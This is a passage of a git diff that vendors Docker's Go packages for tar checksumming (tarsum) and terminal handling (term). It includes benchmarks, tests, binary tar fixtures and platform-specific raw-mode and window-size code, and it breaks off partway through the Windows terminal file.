Benchmark9kTar(b *testing.B) { + buf := bytes.NewBuffer([]byte{}) + fh, err := os.Open("testdata/46af0962ab5afeb5ce6740d4d91652e69206fc991fd5328c1a94d364ad00e457/layer.tar") + if err != nil { + b.Error(err) + return + } + defer fh.Close() + + n, err := io.Copy(buf, fh) + if err != nil { + b.Error(err) + return + } + + reader := bytes.NewReader(buf.Bytes()) + + b.SetBytes(n) + b.ResetTimer() + for i := 0; i < b.N; i++ { + reader.Seek(0, 0) + ts, err := NewTarSum(reader, true, Version0) + if err != nil { + b.Error(err) + return + } + io.Copy(ioutil.Discard, ts) + ts.Sum(nil) + } +} + +func Benchmark9kTarGzip(b *testing.B) { + buf := bytes.NewBuffer([]byte{}) + fh, err := os.Open("testdata/46af0962ab5afeb5ce6740d4d91652e69206fc991fd5328c1a94d364ad00e457/layer.tar") + if err != nil { + b.Error(err) + return + } + defer fh.Close() + + n, err := io.Copy(buf, fh) + if err != nil { + b.Error(err) + return + } + + reader := bytes.NewReader(buf.Bytes()) + + b.SetBytes(n) + b.ResetTimer() + for i := 0; i < b.N; i++ { + reader.Seek(0, 0) + ts, err := NewTarSum(reader, false, Version0) + if err != nil { + b.Error(err) + return + } + io.Copy(ioutil.Discard, ts) + ts.Sum(nil) + } +} + +// this is a single big file in the tar archive +func Benchmark1mbSingleFileTar(b *testing.B) { + benchmarkTar(b, sizedOptions{1, 1024 * 1024, true, true}, false) +} + +// this is a single big file in the tar archive +func Benchmark1mbSingleFileTarGzip(b *testing.B) { + benchmarkTar(b, sizedOptions{1, 1024 * 1024, true, true}, true) +} + +// this is 1024 1k files in the tar archive +func Benchmark1kFilesTar(b *testing.B) { + benchmarkTar(b, sizedOptions{1024, 1024, true, true}, false) +} + +// this is 1024 1k files in the tar archive +func Benchmark1kFilesTarGzip(b *testing.B) { + benchmarkTar(b, sizedOptions{1024, 1024, true, true}, true) +} + +func benchmarkTar(b *testing.B, opts sizedOptions, isGzip bool) { + var fh *os.File + tarReader := sizedTar(opts) + if br, ok := tarReader.(*os.File); ok { + fh = br + } + defer os.Remove(fh.Name()) + defer fh.Close() + + b.SetBytes(opts.size * opts.num) + b.ResetTimer() + for i := 0; i < b.N; i++ { + ts, err := NewTarSum(fh, !isGzip, Version0) + if err != nil { + b.Error(err) + return + } + io.Copy(ioutil.Discard, ts) + ts.Sum(nil) + fh.Seek(0, 0) + } +} diff --git a/vendor/github.com/docker/docker/pkg/tarsum/testdata/46af0962ab5afeb5ce6740d4d91652e69206fc991fd5328c1a94d364ad00e457/json b/vendor/github.com/docker/docker/pkg/tarsum/testdata/46af0962ab5afeb5ce6740d4d91652e69206fc991fd5328c1a94d364ad00e457/json new file mode 100644 index 0000000000..48e2af349c --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/tarsum/testdata/46af0962ab5afeb5ce6740d4d91652e69206fc991fd5328c1a94d364ad00e457/json @@ -0,0 +1 @@ +{"id":"46af0962ab5afeb5ce6740d4d91652e69206fc991fd5328c1a94d364ad00e457","parent":"def3f9165934325dfd027c86530b2ea49bb57a0963eb1336b3a0415ff6fd56de","created":"2014-04-07T02:45:52.610504484Z","container":"e0f07f8d72cae171a3dcc35859960e7e956e0628bce6fedc4122bf55b2c287c7","container_config":{"Hostname":"88807319f25e","Domainname":"","User":"","Memory":0,"MemorySwap":0,"CpuShares":0,"AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"ExposedPorts":null,"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":["HOME=/","PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"],"Cmd":["/bin/sh","-c","sed -ri 's/^(%wheel.*)(ALL)$/\\1NOPASSWD: \\2/' /etc/sudoers"],"Image":"def3f9165934325dfd027c86530b2ea49bb57a0963eb1336b3a0415ff6fd56de","Volumes":null,"WorkingDir":"","Entrypoint":null,"NetworkDisabled":false,"OnBuild":[]},"docker_version":"0.9.1-dev","config":{"Hostname":"88807319f25e","Domainname":"","User":"","Memory":0,"MemorySwap":0,"CpuShares":0,"AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"ExposedPorts":null,"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":["HOME=/","PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"],"Cmd":null,"Image":"def3f9165934325dfd027c86530b2ea49bb57a0963eb1336b3a0415ff6fd56de","Volumes":null,"WorkingDir":"","Entrypoint":null,"NetworkDisabled":false,"OnBuild":[]},"architecture":"amd64","os":"linux","Size":3425} \ No newline at end of file diff --git a/vendor/github.com/docker/docker/pkg/tarsum/testdata/46af0962ab5afeb5ce6740d4d91652e69206fc991fd5328c1a94d364ad00e457/layer.tar b/vendor/github.com/docker/docker/pkg/tarsum/testdata/46af0962ab5afeb5ce6740d4d91652e69206fc991fd5328c1a94d364ad00e457/layer.tar new file mode 100644 index 0000000000000000000000000000000000000000..dfd5c204aea77673f13fdd2f81cb4af1c155c00c GIT binary patch literal 9216 zcmeHMYfsx)8s=;H6|bl&iYAZ?p-5<1$(y*vYHk~c?XX{vu}|fzRr1|&zyvK1! zQq)nWWVPA}63Myvy*}^F5Qtg*V8=g=M!Ru&adFTnf40B*^q|=~Z#CM@#>M%EgGRH_ zXtfULV#j(J_Jz`34wZgZ*0ym!%kRHL9{_(p&BZRoHJYu)<>loz?$!PU{9Bjp<^i?p zS)Tg!r=9Az$G@(0Ao6^75%A;qpMSV)ukcqQn%1X5y|oh!_xLmZX`y%GUBmQG;D6af z{a@yPg@1D=8t(B&ZtcXgE2ck=f9pf*x&ANlU$J}L#UB59rsJ=#>(otde**vZ1?PXJ z)y|dMh8z!Kfh=;zN!B|J)*y8)L$Hbq5c2K_rK=l{{8R8czxwV#$Odd zDsuJ8oS)h8`+U3IsNVOszdy8F?XCC!X1jHMK)Xr!XT8koFP{Hz-;!IxPhJ$Ib48h# zYv~t}ms6n-7Nk?ki-cxgF4IDhpT@D51d2R$2x=V)%F|Svhif#KI>gHaB|@O7JU(A% zo>KEP56(cuboN&-&LROexgfmf&txD1^0c9NNVQI5N~dNwm64!nnnQFH317=JF`{vu zi^$WUtCWHQq4Y!Yy@W{oRoV29sUd<=@!~sJ;!ok8>_qYfz|Ch12+9P6$8i`#qvqS zhsLT-8QL!zwhRx(aXaYF&PwD5LLOm%T#Ds>) z{YV0A>qPL*aFLnz9*nfyl@!I3_Ss=Y=MKNEA zG8|$lPj#9`#(W1sgCgK@f)P?2A)0uPB8Gf6TLITOAl@|29e$jAvBox=W-QCrr59N% zKg$7Xy=69F7QR_X7D_-i2hs*J)6%&RIBr9LDPPP_-? z-X`DPuwzY(j+Gk=rWL_Msfvvp-prW$3W(MwPPgEZO^EI!{*XIAuLp zlpj9k85vO{{2kR4hD{4c;~{+QmhNVfq;xeepJc>QQ@QJfEkdQVBbPJuiA~nsv9l~O zrN&UpxC9i`6;rQ>v?7%WUrr@(gXOs4JE=IN=}4(?RS=2GEd9-ogTEiuP>Fqyb6;vM ziV-Q;Z|ZT?Vz^rPk?`^}6a`cC_=9V1=*>jc&y0jq{h|=m&BK+Jpv}ea1?sKVi^Gj` zk<9K*;4?gK^?Jl6-g0L4kQcX>OZUHi{>Odi#u~f!gnqSdCpW{f zGr2q31WO6O$i;nz9#NH-D^8Rv6Xcv%XFkhmyBsZ;8k2ftd;fPtN1v+`G zPRv~5E)wm1y}~(Py9GwK;`;9K2C_2#(Rc=qFBTa z>?ZUNHvSmq9G9)M%0u+CW!J=jv1~Clz-avUIImk%<&=a9uI;2EY~~stiCKTsh|Oow<5; z$eY1%WV!B_?iFikc)C2TV46YQucl=WfmM#jY|_4sK>Njf)j#u#Y{x@V_A!c2o<`D? zX*2YQ4A)U054Qh4y3hVk?0?5^Us~rh*TViU9vl!r009ILKmY**5I_I{1Q0*~0R#|0 Y009ILKmY**5I_I{1Q0*~fqxTt0{2EK)Bpeg literal 0 HcmV?d00001 diff --git a/vendor/github.com/docker/docker/pkg/tarsum/testdata/collision/collision-2.tar b/vendor/github.com/docker/docker/pkg/tarsum/testdata/collision/collision-2.tar new file mode 100644 index 0000000000000000000000000000000000000000..7b5c04a9644808851fcccab5c3c240bf342abd93 GIT binary patch literal 10240 zcmeIuF%E+;425COJw=XS2L~?Dp<74P5hRe1I+e8NZ(w35>V(Abzr};)_<@(2e`|Ha`Z>GG~@_KYd${~ON w0tg_000IagfB*srAbVE5xzPBd+@To)G|2840byWhU|?oqf;;~Mb02E{2kHRk de~R-YhD)#rjPU%AB}7JrMnhmU1V%^*0091(G-Ch& literal 0 HcmV?d00001 diff --git a/vendor/github.com/docker/docker/pkg/tarsum/versioning.go b/vendor/github.com/docker/docker/pkg/tarsum/versioning.go new file mode 100644 index 0000000000..2882286854 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/tarsum/versioning.go @@ -0,0 +1,150 @@ +package tarsum + +import ( + "archive/tar" + "errors" + "sort" + "strconv" + "strings" +) + +// Version is used for versioning of the TarSum algorithm +// based on the prefix of the hash used +// i.e. "tarsum+sha256:e58fcf7418d4390dec8e8fb69d88c06ec07039d651fedd3aa72af9972e7d046b" +type Version int + +// Prefix of "tarsum" +const ( + Version0 Version = iota + Version1 + // VersionDev this constant will be either the latest or an unsettled next-version of the TarSum calculation + VersionDev +) + +// VersionLabelForChecksum returns the label for the given tarsum +// checksum, i.e., everything before the first `+` character in +// the string or an empty string if no label separator is found. +func VersionLabelForChecksum(checksum string) string { + // Checksums are in the form: {versionLabel}+{hashID}:{hex} + sepIndex := strings.Index(checksum, "+") + if sepIndex < 0 { + return "" + } + return checksum[:sepIndex] +} + +// GetVersions gets a list of all known tarsum versions. +func GetVersions() []Version { + v := []Version{} + for k := range tarSumVersions { + v = append(v, k) + } + return v +} + +var ( + tarSumVersions = map[Version]string{ + Version0: "tarsum", + Version1: "tarsum.v1", + VersionDev: "tarsum.dev", + } + tarSumVersionsByName = map[string]Version{ + "tarsum": Version0, + "tarsum.v1": Version1, + "tarsum.dev": VersionDev, + } +) + +func (tsv Version) String() string { + return tarSumVersions[tsv] +} + +// GetVersionFromTarsum returns the Version from the provided string. +func GetVersionFromTarsum(tarsum string) (Version, error) { + tsv := tarsum + if strings.Contains(tarsum, "+") { + tsv = strings.SplitN(tarsum, "+", 2)[0] + } + for v, s := range tarSumVersions { + if s == tsv { + return v, nil + } + } + return -1, ErrNotVersion +} + +// Errors that may be returned by functions in this package +var ( + ErrNotVersion = errors.New("string does not include a TarSum Version") + ErrVersionNotImplemented = errors.New("TarSum Version is not yet implemented") +) + +// tarHeaderSelector is the interface which different versions +// of tarsum should use for selecting and ordering tar headers +// for each item in the archive. +type tarHeaderSelector interface { + selectHeaders(h *tar.Header) (orderedHeaders [][2]string) +} + +type tarHeaderSelectFunc func(h *tar.Header) (orderedHeaders [][2]string) + +func (f tarHeaderSelectFunc) selectHeaders(h *tar.Header) (orderedHeaders [][2]string) { + return f(h) +} + +func v0TarHeaderSelect(h *tar.Header) (orderedHeaders [][2]string) { + return [][2]string{ + {"name", h.Name}, + {"mode", strconv.FormatInt(h.Mode, 10)}, + {"uid", strconv.Itoa(h.Uid)}, + {"gid", strconv.Itoa(h.Gid)}, + {"size", strconv.FormatInt(h.Size, 10)}, + {"mtime", strconv.FormatInt(h.ModTime.UTC().Unix(), 10)}, + {"typeflag", string([]byte{h.Typeflag})}, + {"linkname", h.Linkname}, + {"uname", h.Uname}, + {"gname", h.Gname}, + {"devmajor", strconv.FormatInt(h.Devmajor, 10)}, + {"devminor", strconv.FormatInt(h.Devminor, 10)}, + } +} + +func v1TarHeaderSelect(h *tar.Header) (orderedHeaders [][2]string) { + // Get extended attributes. + xAttrKeys := make([]string, len(h.Xattrs)) + for k := range h.Xattrs { + xAttrKeys = append(xAttrKeys, k) + } + sort.Strings(xAttrKeys) + + // Make the slice with enough capacity to hold the 11 basic headers + // we want from the v0 selector plus however many xattrs we have. + orderedHeaders = make([][2]string, 0, 11+len(xAttrKeys)) + + // Copy all headers from v0 excluding the 'mtime' header (the 5th element). + v0headers := v0TarHeaderSelect(h) + orderedHeaders = append(orderedHeaders, v0headers[0:5]...) + orderedHeaders = append(orderedHeaders, v0headers[6:]...) + + // Finally, append the sorted xattrs. + for _, k := range xAttrKeys { + orderedHeaders = append(orderedHeaders, [2]string{k, h.Xattrs[k]}) + } + + return +} + +var registeredHeaderSelectors = map[Version]tarHeaderSelectFunc{ + Version0: v0TarHeaderSelect, + Version1: v1TarHeaderSelect, + VersionDev: v1TarHeaderSelect, +} + +func getTarHeaderSelector(v Version) (tarHeaderSelector, error) { + headerSelector, ok := registeredHeaderSelectors[v] + if !ok { + return nil, ErrVersionNotImplemented + } + + return headerSelector, nil +} diff --git a/vendor/github.com/docker/docker/pkg/tarsum/versioning_test.go b/vendor/github.com/docker/docker/pkg/tarsum/versioning_test.go new file mode 100644 index 0000000000..88e0a5783c --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/tarsum/versioning_test.go @@ -0,0 +1,98 @@ +package tarsum + +import ( + "testing" +) + +func TestVersionLabelForChecksum(t *testing.T) { + version := VersionLabelForChecksum("tarsum+sha256:deadbeef") + if version != "tarsum" { + t.Fatalf("Version should have been 'tarsum', was %v", version) + } + version = VersionLabelForChecksum("tarsum.v1+sha256:deadbeef") + if version != "tarsum.v1" { + t.Fatalf("Version should have been 'tarsum.v1', was %v", version) + } + version = VersionLabelForChecksum("something+somethingelse") + if version != "something" { + t.Fatalf("Version should have been 'something', was %v", version) + } + version = VersionLabelForChecksum("invalidChecksum") + if version != "" { + t.Fatalf("Version should have been empty, was %v", version) + } +} + +func TestVersion(t *testing.T) { + expected := "tarsum" + var v Version + if v.String() != expected { + t.Errorf("expected %q, got %q", expected, v.String()) + } + + expected = "tarsum.v1" + v = 1 + if v.String() != expected { + t.Errorf("expected %q, got %q", expected, v.String()) + } + + expected = "tarsum.dev" + v = 2 + if v.String() != expected { + t.Errorf("expected %q, got %q", expected, v.String()) + } +} + +func TestGetVersion(t *testing.T) { + testSet := []struct { + Str string + Expected Version + }{ + {"tarsum+sha256:e58fcf7418d4390dec8e8fb69d88c06ec07039d651fedd3aa72af9972e7d046b", Version0}, + {"tarsum+sha256", Version0}, + {"tarsum", Version0}, + {"tarsum.dev", VersionDev}, + {"tarsum.dev+sha256:deadbeef", VersionDev}, + } + + for _, ts := range testSet { + v, err := GetVersionFromTarsum(ts.Str) + if err != nil { + t.Fatalf("%q : %s", err, ts.Str) + } + if v != ts.Expected { + t.Errorf("expected %d (%q), got %d (%q)", ts.Expected, ts.Expected, v, v) + } + } + + // test one that does not exist, to ensure it errors + str := "weak+md5:abcdeabcde" + _, err := GetVersionFromTarsum(str) + if err != ErrNotVersion { + t.Fatalf("%q : %s", err, str) + } +} + +func TestGetVersions(t *testing.T) { + expected := []Version{ + Version0, + Version1, + VersionDev, + } + versions := GetVersions() + if len(versions) != len(expected) { + t.Fatalf("Expected %v versions, got %v", len(expected), len(versions)) + } + if !containsVersion(versions, expected[0]) || !containsVersion(versions, expected[1]) || !containsVersion(versions, expected[2]) { + t.Fatalf("Expected [%v], got [%v]", expected, versions) + } +} + +func containsVersion(versions []Version, version Version) bool { + for _, v := range versions { + if v == version { + return true + } + } + return false +} diff --git a/vendor/github.com/docker/docker/pkg/tarsum/writercloser.go b/vendor/github.com/docker/docker/pkg/tarsum/writercloser.go new file mode 100644 index 0000000000..9727ecde3e --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/tarsum/writercloser.go @@ -0,0 +1,22 @@ +package tarsum + +import ( + "io" +) + +type writeCloseFlusher interface { + io.WriteCloser + Flush() error +} + +type nopCloseFlusher struct { + io.Writer +} + +func (n *nopCloseFlusher) Close() error { + return nil +} + +func (n *nopCloseFlusher) Flush() error { + return nil +} diff --git a/vendor/github.com/docker/docker/pkg/term/ascii.go b/vendor/github.com/docker/docker/pkg/term/ascii.go new file mode 100644 index 0000000000..f5262bccf5 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/term/ascii.go @@ -0,0 +1,66 @@ +package term + +import ( + "fmt" + "strings" +) + +// ASCII list the possible supported ASCII key sequence +var ASCII = []string{ + "ctrl-@", + "ctrl-a", + "ctrl-b", + "ctrl-c", + "ctrl-d", + "ctrl-e", + "ctrl-f", + "ctrl-g", + "ctrl-h", + "ctrl-i", + "ctrl-j", + "ctrl-k", + "ctrl-l", + "ctrl-m", + "ctrl-n", + "ctrl-o", + "ctrl-p", + "ctrl-q", + "ctrl-r", + "ctrl-s", + "ctrl-t", + "ctrl-u", + "ctrl-v", + "ctrl-w", + "ctrl-x", + "ctrl-y", + "ctrl-z", + "ctrl-[", + "ctrl-\\", + "ctrl-]", + "ctrl-^", + "ctrl-_", +} + +// ToBytes converts a string representing a suite of key-sequence to the corresponding ASCII code. +func ToBytes(keys string) ([]byte, error) { + codes := []byte{} +next: + for _, key := range strings.Split(keys, ",") { + if len(key) != 1 { + for code, ctrl := range ASCII { + if ctrl == key { + codes = append(codes, byte(code)) + continue next + } + } + if key == "DEL" { + codes = append(codes, 127) + } else { + return nil, fmt.Errorf("Unknown character: '%s'", key) + } + } else { + codes = append(codes, byte(key[0])) + } + } + return codes, nil +} diff --git a/vendor/github.com/docker/docker/pkg/term/ascii_test.go b/vendor/github.com/docker/docker/pkg/term/ascii_test.go new file mode 100644 index 0000000000..4a1e7f302c --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/term/ascii_test.go @@ -0,0 +1,43 @@ +package term + +import "testing" + +func TestToBytes(t *testing.T) { + codes, err := ToBytes("ctrl-a,a") + if err != nil { + t.Fatal(err) + } + if len(codes) != 2 { + t.Fatalf("Expected 2 codes, got %d", len(codes)) + } + if codes[0] != 1 || codes[1] != 97 { + t.Fatalf("Expected '1' '97', got '%d' '%d'", codes[0], codes[1]) + } + + codes, err = ToBytes("shift-z") + if err == nil { + t.Fatalf("Expected error, got none") + } + + codes, err = ToBytes("ctrl-@,ctrl-[,~,ctrl-o") + if err != nil { + t.Fatal(err) + } + if len(codes) != 4 { + t.Fatalf("Expected 4 codes, got %d", len(codes)) + } + if codes[0] != 0 || codes[1] != 27 || codes[2] != 126 || codes[3] != 15 { + t.Fatalf("Expected '0' '27' '126', '15', got '%d' '%d' '%d' '%d'", codes[0], codes[1], codes[2], codes[3]) + } + + codes, err = ToBytes("DEL,+") + if err != nil { + t.Fatal(err) + } + if len(codes) != 2 { + t.Fatalf("Expected 2 codes, got %d", len(codes)) + } + if codes[0] != 127 || codes[1] != 43 { + t.Fatalf("Expected '127 '43'', got '%d' '%d'", codes[0], codes[1]) + } +} diff --git a/vendor/github.com/docker/docker/pkg/term/tc_linux_cgo.go b/vendor/github.com/docker/docker/pkg/term/tc_linux_cgo.go new file mode 100644 index 0000000000..59dac5ba8e --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/term/tc_linux_cgo.go @@ -0,0 +1,50 @@ +// +build linux,cgo + +package term + +import ( + "syscall" + "unsafe" +) + +// #include +import "C" + +// Termios is the Unix API for terminal I/O. +// It is passthrough for syscall.Termios in order to make it portable with +// other platforms where it is not available or handled differently. +type Termios syscall.Termios + +// MakeRaw put the terminal connected to the given file descriptor into raw +// mode and returns the previous state of the terminal so that it can be +// restored. +func MakeRaw(fd uintptr) (*State, error) { + var oldState State + if err := tcget(fd, &oldState.termios); err != 0 { + return nil, err + } + + newState := oldState.termios + + C.cfmakeraw((*C.struct_termios)(unsafe.Pointer(&newState))) + if err := tcset(fd, &newState); err != 0 { + return nil, err + } + return &oldState, nil +} + +func tcget(fd uintptr, p *Termios) syscall.Errno { + ret, err := C.tcgetattr(C.int(fd), (*C.struct_termios)(unsafe.Pointer(p))) + if ret != 0 { + return err.(syscall.Errno) + } + return 0 +} + +func tcset(fd uintptr, p *Termios) syscall.Errno { + ret, err := C.tcsetattr(C.int(fd), C.TCSANOW, (*C.struct_termios)(unsafe.Pointer(p))) + if ret != 0 { + return err.(syscall.Errno) + } + return 0 +} diff --git a/vendor/github.com/docker/docker/pkg/term/tc_other.go b/vendor/github.com/docker/docker/pkg/term/tc_other.go new file mode 100644 index 0000000000..750d7c3f60 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/term/tc_other.go @@ -0,0 +1,20 @@ +// +build !windows +// +build !linux !cgo +// +build !solaris !cgo + +package term + +import ( + "syscall" + "unsafe" +) + +func tcget(fd uintptr, p *Termios) syscall.Errno { + _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(getTermios), uintptr(unsafe.Pointer(p))) + return err +} + +func tcset(fd uintptr, p *Termios) syscall.Errno { + _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, setTermios, uintptr(unsafe.Pointer(p))) + return err +} diff --git a/vendor/github.com/docker/docker/pkg/term/tc_solaris_cgo.go b/vendor/github.com/docker/docker/pkg/term/tc_solaris_cgo.go new file mode 100644 index 0000000000..c9139d0ca8 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/term/tc_solaris_cgo.go @@ -0,0 +1,63 @@ +// +build solaris,cgo + +package term + +import ( + "syscall" + "unsafe" +) + +// #include +import "C" + +// Termios is the Unix API for terminal I/O. +// It is passthrough for syscall.Termios in order to make it portable with +// other platforms where it is not available or handled differently. +type Termios syscall.Termios + +// MakeRaw put the terminal connected to the given file descriptor into raw +// mode and returns the previous state of the terminal so that it can be +// restored. +func MakeRaw(fd uintptr) (*State, error) { + var oldState State + if err := tcget(fd, &oldState.termios); err != 0 { + return nil, err + } + + newState := oldState.termios + + newState.Iflag &^= (syscall.IGNBRK | syscall.BRKINT | syscall.PARMRK | syscall.ISTRIP | syscall.INLCR | syscall.IGNCR | syscall.ICRNL | syscall.IXON | syscall.IXANY) + newState.Oflag &^= syscall.OPOST + newState.Lflag &^= (syscall.ECHO | syscall.ECHONL | syscall.ICANON | syscall.ISIG | syscall.IEXTEN) + newState.Cflag &^= (syscall.CSIZE | syscall.PARENB) + newState.Cflag |= syscall.CS8 + + /* + VMIN is the minimum number of characters that needs to be read in non-canonical mode for it to be returned + Since VMIN is overloaded with another element in canonical mode when we switch modes it defaults to 4. It + needs to be explicitly set to 1. + */ + newState.Cc[C.VMIN] = 1 + newState.Cc[C.VTIME] = 0 + + if err := tcset(fd, &newState); err != 0 { + return nil, err + } + return &oldState, nil +} + +func tcget(fd uintptr, p *Termios) syscall.Errno { + ret, err := C.tcgetattr(C.int(fd), (*C.struct_termios)(unsafe.Pointer(p))) + if ret != 0 { + return err.(syscall.Errno) + } + return 0 +} + +func tcset(fd uintptr, p *Termios) syscall.Errno { + ret, err := C.tcsetattr(C.int(fd), C.TCSANOW, (*C.struct_termios)(unsafe.Pointer(p))) + if ret != 0 { + return err.(syscall.Errno) + } + return 0 +} diff --git a/vendor/github.com/docker/docker/pkg/term/term.go b/vendor/github.com/docker/docker/pkg/term/term.go new file mode 100644 index 0000000000..fe59faa949 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/term/term.go @@ -0,0 +1,123 @@ +// +build !windows + +// Package term provides structures and helper functions to work with +// terminal (state, sizes). +package term + +import ( + "errors" + "fmt" + "io" + "os" + "os/signal" + "syscall" +) + +var ( + // ErrInvalidState is returned if the state of the terminal is invalid. + ErrInvalidState = errors.New("Invalid terminal state") +) + +// State represents the state of the terminal. +type State struct { + termios Termios +} + +// Winsize represents the size of the terminal window. +type Winsize struct { + Height uint16 + Width uint16 + x uint16 + y uint16 +} + +// StdStreams returns the standard streams (stdin, stdout, stedrr). +func StdStreams() (stdIn io.ReadCloser, stdOut, stdErr io.Writer) { + return os.Stdin, os.Stdout, os.Stderr +} + +// GetFdInfo returns the file descriptor for an os.File and indicates whether the file represents a terminal. +func GetFdInfo(in interface{}) (uintptr, bool) { + var inFd uintptr + var isTerminalIn bool + if file, ok := in.(*os.File); ok { + inFd = file.Fd() + isTerminalIn = IsTerminal(inFd) + } + return inFd, isTerminalIn +} + +// IsTerminal returns true if the given file descriptor is a terminal. +func IsTerminal(fd uintptr) bool { + var termios Termios + return tcget(fd, &termios) == 0 +} + +// RestoreTerminal restores the terminal connected to the given file descriptor +// to a previous state. +func RestoreTerminal(fd uintptr, state *State) error { + if state == nil { + return ErrInvalidState + } + if err := tcset(fd, &state.termios); err != 0 { + return err + } + return nil +} + +// SaveState saves the state of the terminal connected to the given file descriptor. +func SaveState(fd uintptr) (*State, error) { + var oldState State + if err := tcget(fd, &oldState.termios); err != 0 { + return nil, err + } + + return &oldState, nil +} + +// DisableEcho applies the specified state to the terminal connected to the file +// descriptor, with echo disabled. +func DisableEcho(fd uintptr, state *State) error { + newState := state.termios + newState.Lflag &^= syscall.ECHO + + if err := tcset(fd, &newState); err != 0 { + return err + } + handleInterrupt(fd, state) + return nil +} + +// SetRawTerminal puts the terminal connected to the given file descriptor into +// raw mode and returns the previous state. On UNIX, this puts both the input +// and output into raw mode. On Windows, it only puts the input into raw mode. +func SetRawTerminal(fd uintptr) (*State, error) { + oldState, err := MakeRaw(fd) + if err != nil { + return nil, err + } + handleInterrupt(fd, oldState) + return oldState, err +} + +// SetRawTerminalOutput puts the output of terminal connected to the given file +// descriptor into raw mode. On UNIX, this does nothing and returns nil for the +// state. On Windows, it disables LF -> CRLF translation. +func SetRawTerminalOutput(fd uintptr) (*State, error) { + return nil, nil +} + +func handleInterrupt(fd uintptr, state *State) { + sigchan := make(chan os.Signal, 1) + signal.Notify(sigchan, os.Interrupt) + go func() { + for range sigchan { + // quit cleanly and the new terminal item is on a new line + fmt.Println() + signal.Stop(sigchan) + close(sigchan) + RestoreTerminal(fd, state) + os.Exit(1) + } + }() +} diff --git a/vendor/github.com/docker/docker/pkg/term/term_solaris.go b/vendor/github.com/docker/docker/pkg/term/term_solaris.go new file mode 100644 index 0000000000..112debbec5 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/term/term_solaris.go @@ -0,0 +1,41 @@ +// +build solaris + +package term + +import ( + "syscall" + "unsafe" +) + +/* +#include +#include +#include + +// Small wrapper to get rid of variadic args of ioctl() +int my_ioctl(int fd, int cmd, struct winsize *ws) { + return ioctl(fd, cmd, ws); +} +*/ +import "C" + +// GetWinsize returns the window size based on the specified file descriptor. +func GetWinsize(fd uintptr) (*Winsize, error) { + ws := &Winsize{} + ret, err := C.my_ioctl(C.int(fd), C.int(syscall.TIOCGWINSZ), (*C.struct_winsize)(unsafe.Pointer(ws))) + // Skip retval = 0 + if ret == 0 { + return ws, nil + } + return ws, err +} + +// SetWinsize tries to set the specified window size for the specified file descriptor. +func SetWinsize(fd uintptr, ws *Winsize) error { + ret, err := C.my_ioctl(C.int(fd), C.int(syscall.TIOCSWINSZ), (*C.struct_winsize)(unsafe.Pointer(ws))) + // Skip retval = 0 + if ret == 0 { + return nil + } + return err +} diff --git a/vendor/github.com/docker/docker/pkg/term/term_unix.go b/vendor/github.com/docker/docker/pkg/term/term_unix.go new file mode 100644 index 0000000000..ddf87a0e58 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/term/term_unix.go @@ -0,0 +1,29 @@ +// +build !solaris,!windows + +package term + +import ( + "syscall" + "unsafe" +) + +// GetWinsize returns the window size based on the specified file descriptor. +func GetWinsize(fd uintptr) (*Winsize, error) { + ws := &Winsize{} + _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(syscall.TIOCGWINSZ), uintptr(unsafe.Pointer(ws))) + // Skipp errno = 0 + if err == 0 { + return ws, nil + } + return ws, err +} + +// SetWinsize tries to set the specified window size for the specified file descriptor. +func SetWinsize(fd uintptr, ws *Winsize) error { + _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(syscall.TIOCSWINSZ), uintptr(unsafe.Pointer(ws))) + // Skipp errno = 0 + if err == 0 { + return nil + } + return err +} diff --git a/vendor/github.com/docker/docker/pkg/term/term_windows.go b/vendor/github.com/docker/docker/pkg/term/term_windows.go new file mode 100644 index 0000000000..a91f07e482 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/term/term_windows.go @@ -0,0 +1,233 @@ +// +build windows + +package term + +import ( + "io" + "os" + "os/signal" + "syscall" + + "github.com/Azure/go-ansiterm/winterm" + "github.com/docker/docker/pkg/term/windows" +) + +// State holds the console mode for the terminal. +type State struct { + mode uint32 +} + +// Winsize is used for window size. +type Winsize struct { + Height uint16 + Width uint16 +} + +const ( + // https://msdn.microsoft.com/en-us/library/windows/desktop/ms683167(v=vs.85).aspx + enableVirtualTerminalInput = 0x0200 + enableVirtualTerminalProcessing = 0x0004 + disableNewlineAutoReturn = 0x0008 +) + +// vtInputSupported is true if enableVirtualTerminalInput is supported by the console +var vtInputSupported bool + +// StdStreams returns the standard streams (stdin, stdout, stedrr). +func StdStreams() (stdIn io.ReadCloser, stdOut, stdErr io.Writer) { + // Turn on VT handling on all std handles, if possible. This might + // fail, in which case we will fall back to terminal emulation. + var emulateStdin, emulateStdout, emulateStderr bool + fd := os.Stdin.Fd() + if mode, err := winterm.GetConsoleMode(fd); err == nil { + // Validate that enableVirtualTerminalInput is supported, but do not set it. + if err = winterm.SetConsoleMode(fd, mode|enableVirtualTerminalInput); err != nil { + emulateStdin = true + } else { + vtInputSupported = true + } + // Unconditionally set the console mode back even on failure because SetConsoleMode + // remembers invalid bits on input handles. + winterm.SetConsoleMode(fd, mode) + } + + fd = os.Stdout.Fd() + if mode, err := winterm.GetConsoleMode(fd); err == nil { + // Validate disableNewlineAutoReturn is supported, but do not set it. + if err = winterm.SetConsoleMode(fd, mode|enableVirtualTerminalProcessing|disableNewlineAutoReturn); err != nil { + emulateStdout = true + } else { + winterm.SetConsoleMode(fd, mode|enableVirtualTerminalProcessing) + } + } + + fd = os.Stderr.Fd() + if mode, err := winterm.GetConsoleMode(fd); err == nil { + // Validate 